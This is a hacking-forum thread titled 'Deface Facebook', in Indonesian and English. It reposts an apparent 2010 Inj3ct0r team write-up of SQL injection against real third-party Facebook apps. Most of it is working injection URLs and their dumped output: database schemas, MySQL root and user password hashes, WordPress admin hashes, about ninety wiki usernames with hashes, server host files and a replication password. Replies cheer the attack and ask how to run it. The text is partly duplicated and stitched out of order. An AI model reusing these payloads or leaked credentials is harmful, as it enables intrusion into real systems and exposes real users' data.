Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
3 <= ALERT! Users! =]
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
oooooooooooooooooooooooooooo
..> Inj3ct0r_Crach_exploit [ENTER]
user:
admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
cracker:
admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:[email protected]
lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:[email protected]
tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:[email protected]
see request:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
goOd =] Nice Hacking old school xD
__ __ __ __
/'__`\ /'__`\/\ \\ \
/\ \/\ \ __ _/\ \/\ \ \ \\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
\ \ \_\ \/> </\ \ \_\ \ \__ ,__\
\ \____//\_/\_\\ \____/\/_/\_\_/
\/___/ \//\/_/ \/___/ \/_/
[Conclusion]
There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)
__ __ ______
/'__`\ /'__`\/\ ___\
/\ \/\ \ __ _/\ \/\ \ \ \__/
\ \ \ \ \/\ \/'\ \ \ \ \ \___``\
\ \ \_\ \/> </\ \ \_\ \/\ \L\ \
\ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Greetz]
Greetz all Member Inj3ct0r.com
Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org, exploit-db.com, MorningStarSecurity.com..... we have many friends)) Go http://inj3ct0r.com/links =]
Personally h4x0rz:
0x1D, Z0m[b]!e, w01f, cr4wl3r (http://shell4u.oni.cc/), Phenom, bL4Ck_3n91n3, JosS (http://hack0wn.com/), eidelweiss, Farzin0123(Pianist), Th3 RDX, however, n1gh7m4r3, StutM (unitx.net) , Andrew Horton..
You are good hackers. Respect y0u!
Farzin0123(Pianist) visit site : Ueg88.blogfa.com ! Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!
At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook.zip
We want to thank the following people for their contribution.
Do not forget to keep track of vulnerabilities in Inj3ct0r.com
GoOd luck Hackers! =]
# Inj3ct0r.com [2010-04-06]-
Nol Sembilan Tiga
- Posts: 141
- Joined: Wed Apr 07, 2010 1:19 pm
- Location: MaNad0
- Contact:
Re: Deface Facebook
wahh itu app facebookx yg masih vuln... :love:
-==Hanya Ingin belajar dan belajar==-
Re: Deface Facebook
Sepertinya sih begitu kakak....
pi bingung cara eksekusinya......! :pusing: :pusing: :pusing: :pusing:
pi bingung cara eksekusinya......! :pusing: :pusing: :pusing: :pusing:
Re: Deface Facebook
mantap ne TS :ngakak: :ngakak: :ngakak:
-
heripujiantoro
- Posts: 10
- Joined: Tue Jun 08, 2010 12:08 pm
Re: Deface Facebook
itu gimana cara ngegunainya bos...RJ-45 wrote:COba lihat ini bro...
pi ane g tahu ini beneran pa g. coz ku juga lom tanya lngsung ma yan gbersangkutan...Code: Select all
================================================================= FaceBook's servers was hacked by Inj3ct0r team. Hack of the year! ================================================================= Original: http://inj3ct0r.com/exploits/11638 [+] English translation Inj3ct0r official website => Inj3ct0r.com __ __ ___ __ __ /'__`\ /\ \__ /'__`\ /\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___ \/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\ \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \ \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\ \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/ \ \____/ \/___/ [0x00] [Introduction] [0x01] [First impressions] [0x02] [Search for bugs] [0x03] [Inj3ct0r Crash Exploit] [0x04] [Conclusion] [0x05] [Greetz] If you want to know the Inj3ct0r group, read: http://inj3ct0r.com/exploits/9845 __ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\ \/\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \ \ \ \_\ \/> </\ \ \_\ \ \ \_\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Introduction] + [En] => In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system. We did not change the main page, do not sell backup server does not delete files. We have demonstrated the flaw in the system. Start =] .. __ __ _ /'__`\ /'__`\ /' \ /\ \/\ \ __ _/\ \/\ \/\_, \ \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \ \ \ \_\ \/> </\ \ \_\ \ \ \ \ \ \____//\_/\_\\ \____/ \ \_\ \/___/ \//\/_/ \/___/ \/_/ [First impressions] At first glance, FaceBook well protected social network. Scanning FaceBook server did not give nothing interesting ... ) ..> Initiating Parallel DNS resolution of 1 host. Completed Parallel DNS resolution of 1 host. Initiating SYN Stealth Scan Scanning facebook.com (69.63.181.11) [1000 ports] Discovered open port 443/tcp on 69.63.181.11 Discovered open port 80/tcp on 69.63.181.11 Completed SYN Stealth Scan 13.16s elapsed (1000 total ports) Initiating Service scan Scanning 2 services on facebook.com (69.63.181.11) Service scan Timing: About 50.00% done; ETC: Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host) NSE: Script scanning 69.63.181.11. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 22:41 Completed NSE at 22:41, 0.38s elapsed NSE: Script Scanning completed. Nmap scan report for facebook.com (69.63.181.11) Host is up (0.17s latency). Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11 rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https go ahead .. =] __ __ ___ /'__`\ /'__`\ /'___`\ /\ \/\ \ __ _/\ \/\ \/\_\ /\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/// /__ \ \ \_\ \/> </\ \ \_\ \ // /_\ \ \ \____//\_/\_\\ \____//\______/ \/___/ \//\/_/ \/___/ \/_____/ [Search for bugs] We use GoOgle.com request: Facebook+Vulnerability [search] We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities but all this can be found by searching : http://inj3ct0r.com/search All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com request: site:facebook.com WARNING error =\ amit-amit... Let us not lose heart) Hackers are not looking for easy ways Visit Facebook.com Let us search bugs in Web Apps. http://www.facebook.com/robots.txt oooooooooooooooooooooooooooo User-agent: * Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php User-agent: Slurp Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php User-agent: msnbot Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php # E-mail [email protected] and [email protected] if you're authorized to access these, but getting denied. Sitemap: http://www.facebook.com/sitemap.php 00000000000000000000000000000000 nothing interesting =\ http://apps.facebook.com/tvshowchat/ I looked closely, I noticed links http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability... check: http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r ooooooooooooooooooooooooooo Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164 and other.... oooooooooooooooooooooooooooo O_o opsss! After sitting for a while, I realized that one of the servers is on MySql. Writing exploits, I got the following: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1 ooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 5.0.45-log <= ALERT!!! Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 and other.... oooooooooooooooooooooooooooo Database : adminclt_testsite Database User : [email protected] MySQL Version : 5.0.67-log super = ] Now, we just can say that there is SQL Injection Vulnerability http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability] Now we know that there is MySql 5.0.45-log Then let's write another exploit to display tables with information_schema.tables: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1 oooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38 Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/ 201 <= ALERT!!! 201 tables! Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 and other.... oooooooooooooooooooooooooooo http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r] Database : adminclt_testsite Database User : [email protected] MySQL Version : 5.0.67-log 1) AdCode 2) AdTrack 3) Admin_DataStore 4) Admin_User 5) Challenges 6) ChallengesCompleted 7) Comments 8) ContactEmails 9) Content 10) ContentImages 11) FeaturedTemplate 12) FeaturedWidgets 13) Feeds 14) FolderLinks 15) Folders 16) ForumTopics 17) Log 18) LogDumps 19) Newswire 20) NotificationMessages 21) Notifications 22) Orders 23) OutboundMessages 24) Photos 25) Prizes 26) RawExtLinks 27) RawSessions 28) SessionLengths 29) Sites 30) Subscriptions 31) SurveyMonkeys 32) SystemStatus 33) Templates 34) User 35) UserBlogs 36) UserCollectives 37) UserInfo 38) UserInvites 39) Videos 40) WeeklyScores 41) Widgets 42) cronJobs 43) fbSessions Admin_User 1) id 2) name 3) email 4) password 5) userid 6) ncUid 7) level User 1) userid 2) ncUid 3) name 4) email 5) isAdmin 6) isBlocked 7) votePower 8) remoteStatus 9) isMember 10) isModerator 11) isSponsor 12) isEmailVerified 13) isResearcher 14) acceptRules 15) optInStudy 16) optInEmail 17) optInProfile 18) optInFeed 19) optInSMS 20) dateRegistered 21) eligibility 22) cachedPointTotal 23) cachedPointsEarned 24) cachedPointsEarnedThisWeek 25) cachedPointsEarnedLastWeek 26) cachedStoriesPosted 27) cachedCommentsPosted 28) userLevel http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R] Current Database : signalpa_fbmFundRraise Database User : signalpa_rockaja@localhost MySQL Version : 5.0.85-community DATABASE 1) information_schema 2) signalpa_CelebrityPuzzle 3) signalpa_EBF 4) signalpa_appNotification 5) signalpa_appnetwork 6) signalpa_dailyscriptures 7) signalpa_ebayfeed 8) signalpa_fbmFundRraise 9) signalpa_fbmFundRraisebeta 10) signalpa_netcards 11) signalpa_paypal 12) signalpa_thepuzzle signalpa_fbmFundRraise 1) Campaigns 2) Campaigns_Temp 3) FB_theme 4) IfundDollars 5) Languages 6) Payments 7) Paymentsoops 8) Supporters 9) Users 10) Withdrawals 11) invites 12) invites_copy 13) mp_passwords 14) payment_codes 15) txt_codes 16) valid_servers 17) weeklyBonus [+] Column: Users 1) id 2) name 3) email 4) mobile_no 5) address 6) country 7) password 8) organisation 9) date_created 10) date_updated 11) status 12) facebook_id 13) isFacebookFan 14) verify 15) paypalUse 16) paypalEmail 17) bacUse 18) bacAcc 19) bacName 20) bacLocation 21) bacCountry 22) bacIBAN 23) bacSort_code 24) current_rank 25) new_rank 26) cronjob 27) max_fundraise [+] Column: mp_passwords 1) id 2) password 3) username 4) status 5) number 6) rc 7) referer 8) transID 9) currency 10) transType 11) amount 12) confirmed 13) date signalpa_paypal 1) paypal_cart_info 2) paypal_payment_info 3) paypal_subscription_info [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783: [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023: [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59: Column: paypal_cart_info 1) txnid 2) itemname 3) itemnumber 4) os0 5) on0 6) os1 7) on1 8) quantity 9) invoice 10) custom [+] Column : paypal_payment_info 1) firstname 2) lastname 3) buyer_email 4) street 5) city 6) state 7) zipcode 8) memo 9) itemname 10) itemnumber 11) os0 12) on0 13) os1 14) on1 15) quantity 16) paymentdate 17) paymenttype 18) txnid 19) mc_gross 20) mc_fee 21) paymentstatus 22) pendingreason 23) txntype 24) tax 25) mc_currency 26) reasoncode 27) custom 28) country 29) datecreation http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R] Current Database : tv Database User : [email protected] MySQL Version : 5.0.45-log [+] DATABASES 1) information_schema 2) astro 3) candukincaid 4) cemeteries 5) churchwpdb 6) countdownapp 7) crush 8) dare 9) friendiq 10) giants 11) hookup 12) jauntlet 13) loccus 14) luciacanduwp 15) maps 16) martisor 17) mediax 18) mostlikely 19) music 20) pimpfriends 21) plans 22) politicsapp 23) postergifts 24) posters2 25) projectbasecamp 26) pwnfriends 27) quiz 28) seeall 29) send 30) supporter 31) swapu 32) tomsapps 33) travelbug [+] tab.send 1) app 2) item 3) itemforuser 4) neverblue 5) user [+] Columns user(12454) 1) userid 2) siteid 3) appkey 4) session 5) points 6) added 7) removed Tab. candukincaid 1) wp_comments 2) wp_links 3) wp_options 4) wp_post**** 5) wp_posts 6) wp_px_albumPhotos 7) wp_px_albums 8) wp_px_galleries 9) wp_px_photos 10) wp_px_plugins 11) wp_term_relationships 12) wp_term_taxonomy 13) wp_terms 14) wp_user**** 15) wp_users [+]Column wp_users 1) ID 2) user_login 3) user_pass 4) user_nicename 5) user_email 6) user_url 7) user_registered 8) user_activation_key 9) user_status 10) display_name etc... http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r] > ~ inj3ct0r_facebook_exploit [ENTER] root:*368C08021F7260A991A9D8121B7D7808C99BBB8A slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407 muu:*74A45B921A1A918B18AE9B137396E5A67E006262 monitor:*1840AE2C95804EC69321D1EE33AADFA249817034 maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220 http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r] Database: affinispac_fb User: affinispac_fb@localhost Version: 5.0.67-community http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r] >plucky@localhost : facebook : 4.0.13-log etc... =] Next xD Database: thetvdb User: thetvdb@localhost Version: 5.0.51a-24-log [Database]: thetvdb [Table] [1]aka_seriesname [2]apiusers [3]banners [4]deletions [5]genres [6]imgstatus [7]languages [8]mirrors [9]networks [10]ratings [11]runtimes [12]seriesactors [13]seriesupdates [14]translation_episodename [15]translation_episodeoverview [16]translation_labels [17]translation_seriesname [18]translation_seriesoverview [19]tvepisodes [20]tvseasons [21]tvseries [22]user_episodes [23]users users: id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites, favorites_displaymode,bannerlimit,banneragreement,active,uniqueid, lastupdatedby_admin,mirrorupdate [userpass] [1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E: [2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D: [3] *887C5DA43E5ACEE73689956A4497C0EDA956E790: [4] *57D6D9BF9F1962C9A006BB451FAF21693624391E: [5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B: [6] 3d801aa532c1cec3ee82d87a99fdf63f [Database]: wiki [Table] [24]archive [25]categorylinks [26]externallinks [27]filearchive [28]hitcounter [29]image [30]imagelinks [31]interwiki [32]ipblocks [33]job [34]langlinks [35]logging [36]math [37]objectcache [38]oldimage [39]page [40]page_restrictions [41]pagelinks [42]querycache [43]querycache_info [44]querycachetwo [45]recentchanges [46]redirect [47]revision [48]searchindex [49]site_stats [50]templatelinks [51]text [52]trackbacks [53]transcache [54]user [55]user_groups [56]user_newtalk [57]watchlist user: user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time, user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token, user_email_token_expires,user_registration,user_editcount ['user_name'] : ['user_pass'] [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783: [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023: [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59: [4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87: [5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f: [6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4: [7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c: [8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5: [9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5: [10] Bsudbury: [10] 827d07956629c37855f3518374821872: [11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf: [12] Carla: [12] f41991b4dfd3b494c39751225e1faa29: [13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc: [14] Coco: [14] f6770367b7ca8261a25ea797c24761aa: [15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2: [16] Crippler: [16] b3d947a82648b2707130f176204cbbfd: [17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95: [18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be: [19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b: [20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba: [21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029: [22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026: [23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0: [24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19: [25] Eta: [25] f083e5e3fd924342f77e4111df8788e1: [26] Farrism: [26] efef4efa85d73ca0247052687ca9683b: [27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f: [28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee: [29] Fritigern: [29] 6a16028b432de68363a20912c31bca03: [30] Furby: [30] 117088a3b9b504ce23c7926c8691fced: [31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1: [32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c: [33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d: [34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448: [35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb: [36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46: [37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa: [38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7: [39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27: [40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412: [41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07: [42] Kakosi: [42] b747252b62d95163a083acf54141bfc6: [43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765: [44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76: [45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b: [46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814: [47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec: [48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5: [49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d: [50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8: [51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319: [52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9: [53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40: [54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb: [55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607: [56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52: [57] Mreuring: [57] 42472c97f021f725cea7670b078795a1: [58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a: [59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da: [60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580: [61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb: [62] Null dev: [62] 4e744d982a173d0e1439787da27f022c: [63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed: [64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453: [65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714: [66] Plambert: [66] 9333604b2eefdcc01debb843373ae492: [67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161: [68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43: [69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874: [70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731: [71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d: [72] Searlea: [72] 058beaa0d231d457136015119da5aa34: [73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c: [74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975: [75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd: [76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8: [77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540: [78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba: [79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf: [80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2: [81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a: [82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc: [83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f: [84] TommyD: [84] ca62c603dffc337b87a662fa904caa51: [85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5: [86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e: [87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301: [88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c: [89] Trololo23512: [89] 3d508eed899c625389167d2216fae370: [90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8: [91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd: [92] Wwarby: [92] 04409a510d208e737fa00cd97c712740: [93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74: [94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128: [95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b: [96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868: --------------------------------------------------------------------------------------------------------------------------------------------------- read /etc/hosts 127.0.0.1 localhost localhost.localdomain 192.168.1.167 140696-db2.flufffriends.com 140696-db2 192.168.1.166 140695-db1.flufffriends.com 140695-db1 192.168.1.165 140694-web2.flufffriends.com 140694-web2 192.168.1.164 140693-web1.flufffriends.com 140693-web1 69.63.176.141 api.facebook.com 208.116.17.80 peanutlabs.com ---------------------------------- /etc/my.cnf #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1 log-bin=/var/lib/mysqllogs/bin-log binlog-do-db=fluff2 expire-logs-days=14 server-id = 5 #master-host=69.63.176.141 #master-user=romis_user #master-password=romis0123 #master-connect-retry=60 replicate-do-db=miserman #log-slave-updates expire_logs_days = 14 I think we found a sufficient number of vulnerabilities! --------------------------- __ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\_\L\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_ \ \ \_\ \/> </\ \ \_\ \/\ \L\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Inj3ct0r Crash Exploit] So .. Moving on to the fun friends To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =] ..> Inj3ct0rExploit start . + . + . + . + . + . + . wp_posts post_password wp_users user_pass done..... WordPress! oO one of the modules installed in facebook is Wordpress! check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1 oooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67 3 <= ALERT! Users! =] Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124 oooooooooooooooooooooooooooo ..> Inj3ct0r_Crach_exploit [ENTER] user: admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. cracker: admin : 